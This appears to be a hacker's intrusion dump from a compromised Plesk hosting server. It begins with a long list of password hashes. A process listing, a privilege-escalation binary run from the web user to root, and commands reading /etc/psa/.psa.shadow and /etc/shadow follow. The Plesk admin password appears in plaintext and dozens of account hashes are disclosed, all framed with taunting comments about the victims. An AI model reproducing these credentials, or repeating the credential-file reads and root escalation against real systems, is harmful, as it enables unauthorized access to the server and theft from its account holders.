sgsomo:$1$gG5yK4xU$ONDYP.tlcg6YTaB9NSAyJ0 shsd:$1$2Qzvqur1$erX5RIvC9bt48DoK9UXgn1 shsd:$1$KkowHXJI$0OENU1ePlaa16r6/R66RM. shsd:$1$dWHRMEmO$r0SD3BNmRZFNgcJjd2zJh. shsd:$1$KkowHXJI$0OENU1ePlaa16r6/R66RM. ccsook:$1$vI8JJAm1$XXWEHCO6htvjMb56c/HE9/ ccsook:$1$jcQ9B6fS$h6xEznJEHVN2AJCwSIarf1 ccsook:$1$jcQ9B6fS$h6xEznJEHVN2AJCwSIarf1 sfcgar:$1$EqTn7VjG$LWSf095sVWtuTPWQioUVt/ sfcgar:$1$MUBD7oyy$.sTGmbMwRsdBYrfQXfbh6/ sfcgar:$1$MUBD7oyy$.sTGmbMwRsdBYrfQXfbh6/ sfsoar:$1$dvPtn2zd$GlH7j4etEjFOySAHu4oZV0 sfsoar:$1$pZBZJ3Bf$rQlq6FDy7VPjhPYFZ1P64. sfsoar:$1$pZBZJ3Bf$rQlq6FDy7VPjhPYFZ1P64. stoms:$1$2VDTPaiT$o6kUTW6UXLdy6zeqLL2q00 stoms:$1$WyeLFT5e$6KzSbxJ9MuqkYgAaonFqh. stoms:$1$WyeLFT5e$6KzSbxJ9MuqkYgAaonFqh. stcsd:$1$36mnxETG$J0BtoGvBQUIlajywJ65EU. stcsd:$1$TRu9HU67$tsjdX..cGgp4/HOA5IRBk1 stcsd:$1$TRu9HU67$tsjdX..cGgp4/HOA5IRBk1 tcsoal:$1$8IvtSsof$Js4ss4101mHXRhS1UgW.z/ tcsoal:$1$Yf8T/mm8$xbXyku1q9H0g30wAxwler/ tcsoal:$1$/Ciht4fS$S4Hx3kHnNkm3Vu2Cl/E7.1 tcsoal:$1$Yf8T/mm8$xbXyku1q9H0g30wAxwler/ tcsoms:$1$aCobysj2$oZShF1So8TZCuH8dq79UE0 tcsoms:$1$ow2DKzUF$FKjZPhq5ahj/bWC.uPAl61 tcsoms:$1$ow2DKzUF$FKjZPhq5ahj/bWC.uPAl61 tisoms:$1$8mQ6hE6A$CvYlVP6fPLmuSHdyDJg4v1 tisoms:$1$BuFAYulO$kLtpxApIF4yvonPrSmfFW1 tisoms:$1$BuFAYulO$kLtpxApIF4yvonPrSmfFW1 tunms:$1$6F5myr2t$KmJLCml.CybyQjDqoG3TG1 tunms:$1$O42Xnjjg$pKnLJUYfC.weyl1U32Dtf1 tunms:$1$uWPMvVMY$v3Qc7eyUJB7Evpt0iSnOq1 tunms:$1$O42Xnjjg$pKnLJUYfC.weyl1U32Dtf1 vbcsd:$1$C0j6Be38$To6eb4DzaCtA46pN/x6sG. vbcsd:$1$4e/iDO4I$6157lAdEF2IaaYKa2NwNS. wcsoks:$1$WO9U6YiB$wEEafCY2i86zRpEi1hce20 wcsoks:$1$HZoMeTi0$gwdZvPQTqavG4sAiDlEXZ1 wsoks:$1$eSaYt0Fv$vi9zN.GAwbKGQoslpxDr11 // LETS SEE WHAT KINDA SHIT THEY RUNNIN $ ps -aux USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND root 1 0.0 0.0 2156 532 ? Ss Feb22 3:04 init [3] root 2 0.0 0.0 0 0 ? S Feb22 0:35 [migration/0] root 3 0.0 0.0 0 0 ? SN Feb22 4:16 [ksoftirqd/0] root 4 0.0 0.0 0 0 ? S Feb22 0:00 [watchdog/0] root 5 0.0 0.0 0 0 ? S Feb22 0:30 [migration/1] root 6 0.0 0.0 0 0 ? SN Feb22 5:09 [ksoftirqd/1] root 7 0.0 0.0 0 0 ? S Feb22 0:00 [watchdog/1] root 8 0.0 0.0 0 0 ? S Feb22 0:38 [migration/2] root 9 0.0 0.0 0 0 ? SN Feb22 3:03 [ksoftirqd/2] root 10 0.0 0.0 0 0 ? S Feb22 0:00 [watchdog/2] root 11 0.0 0.0 0 0 ? S Feb22 0:53 [migration/3] root 12 0.1 0.0 0 0 ? SN Feb22 337:41 [ksoftirqd/3] root 13 0.0 0.0 0 0 ? S Feb22 0:00 [watchdog/3] root 14 0.0 0.0 0 0 ? S< Feb22 0:01 [events/0] root 15 0.0 0.0 0 0 ? S< Feb22 0:00 [events/1] root 16 0.0 0.0 0 0 ? S< Feb22 0:01 [events/2] root 17 0.0 0.0 0 0 ? S< Feb22 0:13 [events/3] root 18 0.0 0.0 0 0 ? S< Feb22 0:00 [khelper] root 19 0.0 0.0 0 0 ? S< Feb22 0:00 [kthread] root 25 0.0 0.0 0 0 ? S< Feb22 0:01 [kblockd/0] root 26 0.0 0.0 0 0 ? S< Feb22 0:02 [kblockd/1] root 27 0.0 0.0 0 0 ? S< Feb22 0:02 [kblockd/2] root 28 0.0 0.0 0 0 ? S< Feb22 0:27 [kblockd/3] root 29 0.0 0.0 0 0 ? S< Feb22 0:00 [kacpid] root 128 0.0 0.0 0 0 ? S< Feb22 0:00 [cqueue/0] root 129 0.0 0.0 0 0 ? S< Feb22 0:00 [cqueue/1] root 130 0.0 0.0 0 0 ? S< Feb22 0:00 [cqueue/2] root 131 0.0 0.0 0 0 ? S< Feb22 0:00 [cqueue/3] root 134 0.0 0.0 0 0 ? S< Feb22 0:00 [khubd] root 136 0.0 0.0 0 0 ? S< Feb22 0:00 [kseriod] root 213 0.0 0.0 0 0 ? S< Feb22 71:43 [kswapd0] root 214 0.0 0.0 0 0 ? S< Feb22 0:00 [aio/0] root 215 0.0 0.0 0 0 ? S< Feb22 0:00 [aio/1] root 216 0.0 0.0 0 0 ? S< Feb22 0:00 [aio/2] root 217 0.0 0.0 0 0 ? S< Feb22 0:00 [aio/3] root 372 0.0 0.0 0 0 ? S< Feb22 0:00 [kpsmoused] root 417 0.0 0.0 0 0 ? S< Feb22 0:00 [ata/0] root 418 0.0 0.0 0 0 ? S< Feb22 0:00 [ata/1] root 419 0.0 0.0 0 0 ? S< Feb22 0:00 [ata/2] root 420 0.0 0.0 0 0 ? S< Feb22 0:00 [ata/3] root 421 0.0 0.0 0 0 ? S< Feb22 0:00 [ata_aux] root 427 0.0 0.0 0 0 ? S< Feb22 0:00 [scsi_eh_0] root 428 0.0 0.0 0 0 ? S< Feb22 0:00 [scsi_eh_1] root 444 0.0 0.0 0 0 ? S< Feb22 0:00 [scsi_eh_2] root 445 0.0 0.0 0 0 ? S Feb22 0:00 [hpt_wt] root 446 0.0 0.0 0 0 ? S< Feb22 151:44 [kjournald] root 471 0.0 0.0 0 0 ? S< Feb22 1:12 [kauditd] root 504 0.0 0.0 2376 652 ? S< Feb22 0:00 [kmpathd/0] root 1304 0.0 0.0 0 0 ? S< Feb22 0:00 [kmpathd/1] root 1305 0.0 0.0 0 0 ? S< Feb22 0:00 [kmpathd/2] root 1306 0.0 0.0 0 0 ? S< Feb22 0:00 [kmpathd/3] root 1345 0.0 0.0 5072 1608 ? S Jul16 0:01 /usr/bin/couriertls -server -tcpd /usr/sbin/imaplogin /usr/lib/courier-imap/authlib/authpsa /usr/bin/imapd Maildir popuser 1346 0.0 0.0 7296 1144 ? S Jul16 0:03 /usr/bin/imapd Maildir root 1355 0.0 0.0 0 0 ? S< Feb22 0:00 [kjournald] root 1387 0.0 0.0 5072 1848 ? S Jul16 0:01 /usr/bin/couriertls -server -tcpd /usr/sbin/imaplogin /usr/lib/courier-imap/authlib/authpsa /usr/bin/imapd Maildir popuser 1388 0.0 0.0 7372 1528 ? S Jul16 0:54 /usr/bin/imapd Maildir root 1401 0.0 0.0 5072 1608 ? S Jul16 0:01 /usr/bin/couriertls -server -tcpd /usr/sbin/imaplogin /usr/lib/courier-imap/authlib/authpsa /usr/bin/imapd Maildir popuser 1402 0.0 0.0 7296 1508 ? S Jul16 0:02 /usr/bin/imapd Maildir root 2218 0.0 0.0 13668 904 ? S< Feb22 0:00 [krfcommd] root 2489 0.0 0.0 12948 1344 ? Ssl Feb22 2:16 pcscd root 2503 0.0 0.0 1756 520 ? Ss Feb22 0:00 /usr/sbin/acpid root 2527 0.0 0.0 2004 448 ? Ss Feb22 0:00 /usr/bin/hidd --server root 2552 0.0 0.0 30436 1320 ? Ssl Feb22 1:12 automount root 2597 0.0 0.0 7212 872 ? Ss Feb22 2:01 /usr/sbin/sshd root 2610 0.0 0.1 10256 2072 ? Ss Feb22 0:00 cupsd root 2747 0.0 0.0 2000 464 ? Ss Feb22 0:00 gpm -m /dev/input/mice -t exps2 postgres 2982 0.0 0.0 21240 1688 ? S Feb22 0:00 /usr/bin/postmaster -p 5432 -D /var/lib/pgsql/data postgres 2984 0.0 0.0 11016 420 ? S Feb22 0:06 postgres: logger process postgres 3001 0.0 0.0 21240 512 ? S Feb22 0:04 postgres: writer process postgres 3002 0.0 0.0 12020 292 ? S Feb22 0:00 postgres: stats buffer process postgres 3003 0.0 0.0 11204 336 ? S Feb22 0:00 postgres: stats collector process root 3046 0.0 7.0 248660 144752 ? Ss Feb22 108:36 /usr/sbin/httpd xfs 3336 0.0 0.0 3584 1188 ? Ss Feb22 0:00 xfs -droppriv -daemon root 3363 0.0 0.0 2360 444 ? Ss Feb22 0:00 /usr/sbin/atd avahi 3398 0.0 0.0 2684 1316 ? Ss Feb22 0:03 avahi-daemon: running [ip-97-74-115-143.local] avahi 3404 0.0 0.0 2684 424 ? Ss Feb22 0:00 avahi-daemon: chroot helper 68 3435 0.0 0.1 5776 3856 ? Ss Feb22 0:04 hald root 3436 0.0 0.0 3256 1088 ? S Feb22 0:00 hald-runner 68 3447 0.0 0.0 2104 828 ? S Feb22 0:00 hald-addon-acpi: listening on acpid socket /var/run/acpid.socket root 3475 0.0 0.0 33784 884 ? Sl Feb22 0:15 /usr/bin/hptsvr root 3481 0.0 0.5 28360 11900 ? SN Feb22 0:08 /usr/bin/python -tt /usr/sbin/yum-updatesd root 3527 0.0 0.0 2656 1216 ? SN Feb22 0:26 /usr/libexec/gam_server root 3855 0.0 0.0 3604 428 ? S Feb22 0:00 /usr/sbin/smartd -q never root 3858 0.0 0.0 1744 464 tty1 Ss+ Feb22 0:00 /sbin/mingetty tty1 root 3859 0.0 0.0 1748 468 tty2 Ss+ Feb22 0:00 /sbin/mingetty tty2 root 3860 0.0 0.0 1744 464 tty3 Ss+ Feb22 0:00 /sbin/mingetty tty3 root 3862 0.0 0.0 1744 460 tty4 Ss+ Feb22 0:00 /sbin/mingetty tty4 root 3865 0.0 0.0 1744 464 tty5 Ss+ Feb22 0:00 /sbin/mingetty tty5 root 3867 0.0 0.0 1748 468 tty6 Ss+ Feb22 0:00 /sbin/mingetty tty6 root 3869 0.0 0.4 23908 8900 ? Ss Feb22 1:43 /usr/bin/sw-engine -c /usr/local/psa/admin/conf/php.ini /usr/local/psa/admin/bin/modules/watchdog/wdcollect -c /usr/local/psa/etc/modules/watchdog/wdcollect.inc.php root 3870 0.0 0.1 37624 2848 ? Ssl Feb22 47:27 /usr/local/psa/admin/bin/modules/watchdog/monit -Ic /usr/local/psa/etc/modules/watchdog/monitrc root 5213 0.0 0.1 12360 3512 ? Ss Jul22 0:13 sshd: root@notty root 5217 0.0 0.0 6856 1748 ? Ss Jul22 0:00 /usr/libexec/openssh/sftp-server root 5971 0.0 0.0 5068 1616 ? S Jul24 0:00 /usr/bin/couriertls -server -tcpd /usr/sbin/imaplogin /usr/lib/courier-imap/authlib/authpsa /usr/bin/imapd Maildir popuser 5974 0.0 0.0 7300 1248 ? S Jul24 0:00 /usr/bin/imapd Maildir root 6969 0.0 0.1 12132 3216 ? Ss Jul21 0:15 sshd: root@notty root 6978 0.0 0.0 6780 1604 ? Ss Jul21 0:00 /usr/libexec/openssh/sftp-server root 6982 0.0 1.4 32744 30092 ? Ss Jul18 0:17 /usr/bin/spamd --username=popuser --daemonize --nouser-config --helper-home-dir=/var/qmail --max-children 5 --create-prefs --virtual-config-dir=/var/qmail/mailnames/%d/%l/.spamassassin --pidfile=/var/run/spamd/spamd_full.pid --socketpath=/tmp/spamd_full.sock root 7630 0.0 0.0 5380 1000 ? Ss Feb24 1:00 crond root 7986 0.0 0.0 0 0 ? S Jul23 0:12 [pdflush] 30 8301 0.0 0.0 3208 564 ? Ss Mar16 0:00 /usr/lib/plesk-9.0/postfix-queue 127.0.0.1 10027 before-queue 30 8302 0.0 0.0 3208 564 ? Ss Mar16 0:00 /usr/lib/plesk-9.0/postfix-queue 127.0.0.1 10026 before-remote apache 8354 0.1 6.8 249524 140568 ? S 03:04 0:02 /usr/sbin/httpd drweb 9073 0.0 6.8 145876 140908 ? S 03:06 0:00 drwebd.real drweb 9074 0.0 6.8 145876 140932 ? S 03:06 0:00 drwebd.real drweb 9075 0.0 6.8 145876 141492 ? S 03:06 0:00 drwebd.real drweb 9076 0.0 6.8 145876 141088 ? S 03:06 0:00 drwebd.real popuser 9288 0.1 1.7 39044 36312 ? S 00:04 0:17 spamd child 501 9741 0.0 0.2 9744 6176 ? S Jul20 0:27 /usr/sbin/sw-cp-serverd -f /etc/sw-cp-server/config root 10034 0.0 0.0 5072 1616 ? S Jul24 0:00 /usr/bin/couriertls -server -tcpd /usr/sbin/imaplogin /usr/lib/courier-imap/authlib/authpsa /usr/bin/imapd Maildir popuser 10043 0.0 0.0 7296 1292 ? S Jul24 0:00 /usr/bin/imapd Maildir apache 10113 0.1 6.8 249356 140544 ? S 03:14 0:02 /usr/sbin/httpd popuser 10206 0.1 1.7 39588 36860 ? S Jul24 0:49 spamd child root 11201 0.0 0.0 4904 944 pts/2 S+ Jul20 0:00 screen root 11202 0.0 0.0 5584 1668 ? Ss Jul20 0:03 SCREEN root 11203 0.0 0.0 4764 1500 pts/1 Ss+ Jul20 0:00 /bin/bash root 11229 0.0 0.0 4760 1524 pts/3 Ss+ Jul20 0:00 /bin/bash root 11698 0.0 0.0 5072 1612 ? S Jul12 0:01 /usr/bin/couriertls -server -tcpd /usr/sbin/imaplogin /usr/lib/courier-imap/authlib/authpsa /usr/bin/imapd Maildir popuser 11701 0.0 0.0 7296 1500 ? S Jul12 0:42 /usr/bin/imapd Maildir root 11877 0.0 0.0 5072 1612 ? S Jul12 0:01 /usr/bin/couriertls -server -tcpd /usr/sbin/imaplogin /usr/lib/courier-imap/authlib/authpsa /usr/bin/imapd Maildir popuser 11878 0.0 0.0 7296 1172 ? S Jul12 0:13 /usr/bin/imapd Maildir root 12664 0.0 0.0 2832 780 ? Ss May17 1:33 xinetd -stayalive -pidfile /var/run/xinetd.pid drweb 12921 0.4 6.8 145876 142236 ? Ss May05 523:34 drwebd.real apache 14656 0.1 6.8 249468 140792 ? S 03:21 0:02 /usr/sbin/httpd apache 14807 0.0 6.8 249324 140492 ? S 03:22 0:01 /usr/sbin/httpd apache 14927 0.1 7.2 258392 149936 ? S 03:22 0:01 /usr/sbin/httpd apache 15025 0.1 6.8 249560 141268 ? S 03:23 0:02 /usr/sbin/httpd popuser 15706 0.0 0.0 7404 1528 ? S 03:25 0:00 /usr/bin/imapd Maildir 30 15854 0.0 0.0 3208 660 ? Ss Mar22 0:00 /usr/lib/plesk-9.0/postfix-queue 127.0.0.1 10027 before-queue 30 15856 0.0 0.0 3200 824 ? Ss Mar22 0:00 /usr/lib/plesk-9.0/postfix-queue 127.0.0.1 10026 before-remote apache 16054 0.0 6.8 251588 140624 ? S 03:29 0:00 /usr/sbin/httpd apache 16681 0.0 6.7 249208 140300 ? S 03:30 0:00 /usr/sbin/httpd root 17623 0.0 0.0 5072 1616 ? S 00:29 0:00 /usr/bin/couriertls -server -tcpd /usr/sbin/imaplogin /usr/lib/courier-imap/authlib/authpsa /usr/bin/imapd Maildir popuser 17629 0.0 0.0 7296 1412 ? S 00:29 0:00 /usr/bin/imapd Maildir root 17716 0.0 0.0 0 0 ? S Jul24 0:14 [pdflush] popuser 18091 0.0 0.0 7292 1136 ? S 01:38 0:00 /usr/bin/imapd Maildir root 18097 0.0 0.0 5068 1596 ? S 01:38 0:00 couriertls -localfd=4 -tcpd -server apache 18708 0.1 6.7 249328 139912 ? S 03:38 0:00 /usr/sbin/httpd 30 19002 0.0 0.0 3200 564 ? Ss May05 0:00 /usr/lib/plesk-9.0/postfix-queue 127.0.0.1 10026 before-remote root 19106 0.0 0.0 6072 732 ? S Jul08 0:09 /usr/lib/courier-imap/couriertcpd -address=0 -stderrlogger=/usr/sbin/courierlogger -stderrloggername=imapd -maxprocs=40 -maxperip=4 -pid=/var/run/imapd.pid -nodnslookup -noidentlookup 143 /usr/sbin/imaplogin /usr/lib/courier-imap/authlib/authpsa /usr/bin/imapd Maildir root 19110 0.0 0.0 4904 1116 ? S Jul08 0:06 /usr/sbin/courierlogger imapd root 19118 0.0 0.0 6068 732 ? S Jul08 0:14 /usr/lib/courier-imap/couriertcpd -address=0 -stderrlogger=/usr/sbin/courierlogger -stderrloggername=imapd-ssl -maxprocs=40 -maxperip=4 -pid=/var/run/imapd-ssl.pid -nodnslookup -noidentlookup 993 /usr/bin/couriertls -server -tcpd /usr/sbin/imaplogin /usr/lib/courier-imap/authlib/authpsa /usr/bin/imapd Maildir root 19120 0.0 0.0 4904 808 ? S Jul08 0:11 /usr/sbin/courierlogger imapd-ssl root 19126 0.0 0.0 6072 748 ? S Jul08 0:32 /usr/lib/courier-imap/couriertcpd -address=0 -stderrlogger=/usr/sbin/courierlogger -stderrloggername=pop3d -maxprocs=40 -maxperip=4 -pid=/var/run/pop3d.pid -nodnslookup -noidentlookup 110 /usr/sbin/pop3login /usr/lib/courier-imap/authlib/authpsa /usr/bin/pop3d Maildir root 19128 0.0 0.0 4900 1112 ? S Jul08 0:23 /usr/sbin/courierlogger pop3d root 19135 0.0 0.0 6068 728 ? S Jul08 0:30 /usr/lib/courier-imap/couriertcpd -address=0 -stderrlogger=/usr/sbin/courierlogger -stderrloggername=pop3d-ssl -maxprocs=40 -maxperip=4 -pid=/var/run/pop3d-ssl.pid -nodnslookup -noidentlookup 995 /usr/bin/couriertls -server -tcpd /usr/sbin/pop3login /usr/lib/courier-imap/authlib/authpsa /usr/bin/pop3d Maildir root 19137 0.0 0.0 4904 996 ? S Jul08 0:23 /usr/sbin/courierlogger pop3d-ssl apache 20073 0.0 6.7 248988 138776 ? S 03:43 0:00 /usr/sbin/httpd root 20144 0.0 0.0 5068 1612 ? S 03:44 0:00 /usr/bin/couriertls -server -tcpd /usr/sbin/pop3login /usr/lib/courier-imap/authlib/authpsa /usr/bin/pop3d Maildir popuser 20145 0.0 0.0 4936 860 ? S 03:44 0:00 /usr/bin/pop3d Maildir apache 20319 0.0 6.4 236508 132820 ? S Jul24 0:00 /usr/sbin/httpd postfix 20848 0.0 0.1 8816 3452 ? S 03:46 0:00 smtpd -n smtp -t inet -u -c -o smtpd_proxy_filter 127.0.0.1:10025 postfix 20849 0.0 0.0 7012 1732 ? S 03:46 0:00 proxymap -t unix -u postfix 20850 0.0 0.0 7024 1732 ? S 03:46 0:00 anvil -l -t unix -u postfix 20851 0.0 0.1 7172 2156 ? S 03:46 0:00 trivial-rewrite -n rewrite -t unix -u postfix 20852 0.0 0.0 7020 1720 ? S 03:46 0:00 spawn -n 127.0.0.1:10025 -t inet user=mhandlers-user argv=/usr/lib/plesk-9.0/postfix-queue 127.0.0.1 10027 before-queue postfix 20854 0.0 0.0 7024 1728 ? S 03:46 0:00 spawn -n 127.0.0.1:10027 -t inet user=mhandlers-user argv=/usr/lib/plesk-9.0/postfix-queue 127.0.0.1 10026 before-remote postfix 20856 0.0 0.1 8848 3292 ? S 03:46 0:00 smtpd -n 127.0.0.1:10026 -t inet -u -c -o smtpd_client_restrictions -o smtpd_helo_restrictions -o smtpd_sender_restrictions -o smtpd_recipient_restrictions permit_mynetworks,reject -o smtpd_data_restrictions -o receive_override_options no_unknown_recipient_checks postfix 20857 0.0 0.1 7156 2272 ? S 03:46 0:00 cleanup -z -t unix -u postfix 20858 0.0 0.0 7068 1824 ? S 03:46 0:00 pipe -n plesk_virtual -t unix flags=DORhu user=popuser popuser argv=/usr/lib/plesk-9.0/postfix-local -f ${sender} -d ${recipient} -p /var/qmail/mailnames apache 20889 0.0 0.0 2272 824 ? R 03:47 0:00 ps -aux root 21272 0.0 0.1 12936 4096 ? Ss Jul21 0:16 sshd: root@notty root 21278 0.0 0.0 6796 1748 ? Ss Jul21 0:00 /usr/libexec/openssh/sftp-server root 21568 0.0 0.0 6968 1788 ? Ss Jul08 5:03 /usr/libexec/postfix/master postfix 21765 0.0 0.1 8244 3064 ? S Jul08 3:16 qmgr -l -t fifo -u postfix 21910 0.0 0.0 7068 1932 ? S Jul08 0:09 tlsmgr -l -t unix -u apache 22145 0.1 7.0 256496 146220 ? S 01:56 0:08 /usr/sbin/httpd 30 23051 0.0 0.0 3200 652 ? Ss Mar18 0:00 /usr/lib/plesk-9.0/postfix-queue 127.0.0.1 10027 before-queue 30 23052 0.0 0.0 3200 708 ? Ss Mar18 0:00 /usr/lib/plesk-9.0/postfix-queue 127.0.0.1 10026 before-remote root 23196 0.0 0.0 4764 1500 pts/0 Ss+ Jul20 0:00 /bin/bash named 24811 0.0 0.2 72156 5504 ? Ssl Jun29 11:38 /usr/sbin/named -u named -c /etc/named.conf -u named -t /var/named/run-root apache 25023 0.1 6.8 249408 140780 ? S 02:10 0:06 /usr/sbin/httpd apache 25276 0.1 6.8 251928 141112 ? S 02:10 0:09 /usr/sbin/httpd apache 26378 0.1 6.8 249368 140756 ? S 02:13 0:05 /usr/sbin/httpd postfix 30087 0.0 0.0 7032 1780 ? S 02:20 0:00 pickup -l -t fifo -u -c -o content_filter smtp:127.0.0.1:10027 root 30254 0.0 0.1 12140 3216 ? Ss Jul18 0:30 sshd: root@pts/2 root 30395 0.0 0.0 4764 1512 pts/2 Ss Jul18 0:00 -bash apache 30715 0.0 6.8 249436 140620 ? S 02:21 0:04 /usr/sbin/httpd root 31126 0.0 0.0 4624 1216 pts/1 S Jul20 0:00 /bin/sh /usr/bin/mysqld_safe --datadir=/var/lib/mysql --socket=/var/lib/mysql/mysql.sock --log-error=/var/log/mysqld.log --pid-file=/var/run/mysqld/mysqld.pid --user=mysql mysql 31206 24.4 2.2 166880 45728 pts/1 Sl Jul20 1587:18 /usr/libexec/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --skip-external-locking --socket=/var/lib/mysql/mysql.sock root 31988 0.0 0.0 5072 1604 ? S Jul16 0:01 /usr/bin/couriertls -server -tcpd /usr/sbin/imaplogin /usr/lib/courier-imap/authlib/authpsa /usr/bin/imapd Maildir popuser 31992 0.0 0.0 7292 1420 ? S Jul16 0:03 /usr/bin/imapd Maildir // TIME TO GET STREET ON THESE PIGS $ ./a.black.hat.never.kisses.and.tells # id uid=0(root) gid=0(root) groups=48(apache),2521(psaserv) // CRACKING SHADOW FILES ARE LESS FUN WHEN PLESK STORES USER, FTP AND EMAIL // PASSES IN PLAINTEXT IN FILES AND MYSQL PSA TABLES # cat /etc/psa/.psa.shadow 8w667nHzx%XFXb # cat /etc/shadow root:$1$9f.5eJ9.$QUYSU4l8mMYIIhg7Dvk5n0:15135:0:99999:7::: bin:*:13913:0:99999:7::: daemon:*:13913:0:99999:7::: adm:*:13913:0:99999:7::: lp:*:13913:0:99999:7::: sync:*:13913:0:99999:7::: shutdown:*:13913:0:99999:7::: halt:*:13913:0:99999:7::: mail:*:13913:0:99999:7::: news:*:13913:0:99999:7::: uucp:*:13913:0:99999:7::: operator:*:13913:0:99999:7::: games:*:13913:0:99999:7::: gopher:*:13913:0:99999:7::: ftp:*:13913:0:99999:7::: nobody:*:13913:0:99999:7::: rpm:!!:13913:0:99999:7::: dbus:!!:13913:0:99999:7::: mailnull:!!:13913:0:99999:7::: smmsp:!!:13913:0:99999:7::: nscd:!!:13913:0:99999:7::: vcsa:!!:13913:0:99999:7::: rpc:!!:13913:0:99999:7::: rpcuser:!!:13913:0:99999:7::: nfsnobody:!!:13913:0:99999:7::: sshd:!!:13913:0:99999:7::: pcap:!!:13913:0:99999:7::: haldaemon:!!:13913:0:99999:7::: webdept:$1$fMH2nTXH$8mR4nakYDl79MWehtHJpJ/:14599:0:99999:7::: avahi:!!:14599:::::: avahi-autoipd:!!:14599:::::: named:!!:14599:::::: xfs:!!:14599:::::: apache:!!:14599:::::: distcache:!!:14599:::::: mysql:!!:14599:::::: ntp:!!:14599:::::: sw-cp-server:!!:14599:0:99999:7::: psaadm:!!:14599:0:99999:7::: popuser:!!:14599:0:99999:7::: mhandlers-user:!!:14599:0:99999:7::: webalizer:!!:14599:::::: psaftp:!!:14599:0:99999:7::: alias:!!:14599:0:99999:7::: qmaild:!!:14599:0:99999:7::: qmaill:!!:14599:0:99999:7::: qmailp:!!:14599:0:99999:7::: qmailq:!!:14599:0:99999:7::: qmailr:!!:14599:0:99999:7::: qmails:!!:14599:0:99999:7::: postgres:!!:14599:::::: drweb:!!:14599:::::: jdpa:!$1$JyO0yJgZ$HssFeCuxD2qNPBcqVAcrE0:14600:0:99999:7::: barms:$1$JMHnROPk$hW1voLIUUozaP3fB/Q3PS/:14600:0:99999:7::: bcsd:$1$9N.SKA8k$UB9Fa1pj4O9ScqvanwsuD0:14600:0:99999:7::: bjm:$1$nQFDQuzG$nixGXRSZ2weKVIZbWvY2Y1:14600:0:99999:7::: demo:$1$A/PXg4Bp$gxE6Tua9ymjgqIZiruTZJ/:14600:0:99999:7::: dymin:$1$aV.nPRpD$w0u6q9utdB9fC0ze0Y9jk1:14600:0:99999:7::: dcsd:$1$BmkM/hGw$WYVxaTBKlAnAG9oZfTNs40:14600:0:99999:7::: bocg:$1$YCTsX/LA$muqhDQl9XfKRS691T9Ebu0:14600:0:99999:7::: crcsd:$1$R2N6hV/D$Efk6P7K2EF6waHHkC.z9/.:14600:0:99999:7::: bocs:$1$WTdEJKgC$cTG5MeoEUpdCmEODakZbF.:14600:0:99999:7::: izhth:$1$kUKcvc.x$D20GJqyHyrmwvt9SUHSuo0:14600:0:99999:7::: mcmtn:$1$neyLtM6z$VuI6CW0/bf5hdOUqgGkSn0:14600:0:99999:7::: ccsal:$1$vhubLzwF$Evrqm.AX4vusW3SqmZA3B0:14600:0:99999:7::: tunms:$1$annTeiUZ$twvp7SQzRRNJNEIvxS3Cx/:14600:0:99999:7::: ccsd:$1$Lzz71cOH$Djo2V4u/SL9JKqrkvK0/41:14600:0:99999:7::: ciwy:$1$DrcaNoRu$pj27lg4ogzIM/1T3xXCpF/:14600:0:99999:7::: ncsd:$1$KRjV7G3q$sdkmFwpIp7p9FF1f4hhn90:14600:0:99999:7::: icsd:$1$Jg/IPNZ3$173b6vFq9AlwznflpUbzp/:14600:0:99999:7::: shsd:$1$4JEzAXVt$KG42rhcwE0livRJ00Awgb/:14600:0:99999:7::: polms:$1$QEqTUIBr$L1VWAWaGnhYGsRu0FDrr6/:14600:0:99999:7::: grcg:$1$yoyTc6DI$X8v6sg7ExdoUg0bNi8kmU/:14600:0:99999:7::: lawmo:$1$0uQIYYqK$y0TIsAA9Miv4Vfn5o7KhR.:14600:0:99999:7::: johms:$1$ljRMripB$/v33v9izoRJKITBK04ZgV.:14600:0:99999:7::: sacsd:$1$6vTTH5h.$mu0.aSPxOJnNfw0Y1Yhy81:14600:0:99999:7::: jcsd:$1$SR7NPa.y$bXGwoje29eCLh/jeptX7m.:14600:0:99999:7::: gcsd:$1$ai7yamMR$JZPQccHWCGmMDeQFJ56eg0:14600:0:99999:7::: izcg:$1$PpoAe8un$Tmmp4XEdNWUlJPSJv80Xj0:14600:0:99999:7::: jocsd:$1$NRHv77bV$LA2Xex9kNa46frC/0ArlW1:14600:0:99999:7::: scsd:$1$xKBlDTZE$.mpjBbZ0yHHsNcFCmu7pT0:14600:0:99999:7::: bjm2:$1$IyEce8if$BFsLo9r.7HgTftQhJHGPh/:14600:0:99999:7::: test:$1$/SMm0ODb$EX2C/eZ7Lo3BPfzIlZfBF0:14601:0:99999:7::: bcsd_sync:$1$6WexrYqZ$3ROvk9LXiGIAjx/yMFgGc.:14601:0:99999:7::: ccsal_synce:!!:14601:0:99999:7::: ccsal_sync:$1$1R4G9HKN$0nsQSMPnDwPI8QwcOoB4x0:14601:0:99999:7::: kluser:!!:14602:0:99999:7::: tigeraccessftp:$1$vIx5yzLJ$QLvytS5blodUB69dx4Ff81:14607:0:99999:7::: vbcsd:$1$Xa7IjTjy$EVOg0CDGrhKecE9tcEv0K1:14614:0:99999:7::: jonms2:$1$UEKyybmq$V.KCuSAArIbZ97Rb3j.Gj.:14624:0:99999:7::: ccsoks:$1$5Um4tVSe$nmmR1DwLGB1rVtilMJUnW.:14629:0:99999:7::: crcg:$1$5W78GNCt$5AsiPm0MkUOaxLy7PZUbC.:14637:0:99999:7::: tcsoms:$1$AUtRv.T/$8PAgYTEZNTkHAg29MuxxA.:14644:0:99999:7::: hcsoks:$1$QNKj.3g8$a5XwX/ucCpz25QC.a7Yyr1:14650:0:99999:7::: jcsoks:$1$rLe4qHgu$YVf.K6kRj5bzWE/bYYG2x/:14656:0:99999:7::: mosa:$1$dIsYss8M$8wcFZe8f9xyrQg/M5fw2q.:14662:0:99999:7::: pcsoks:$1$aOO/b7/y$fksYEq1P0ydvkBDACy7PN1:14678:0:99999:7::: johms_sync:$1$JJOQW/Ub$KQcLsIuntNhvuT.IgHfr51:15140:0:99999:7::: hcsar:$1$HRrStn03$JID8.6JAq3uO9Ea89sGWy/:14691:0:99999:7::: hscar:$1$eT4u9sV5$1yfafNGVFeJLzHKIDnTPB.:14691:0:99999:7::: pcsoia:$1$iA.cOgM7$bKcN9Md8bgaqgDOeWMLTk1:14692:0:99999:7::: mcsd:$1$w8xq8Wiz$9h9Vmun9mouExbFw5TP9./:14701:0:99999:7::: wsoks:$1$RA/aiiIn$vWff63MvT9OM6m/I9g/wI1:14718:0:99999:7::: 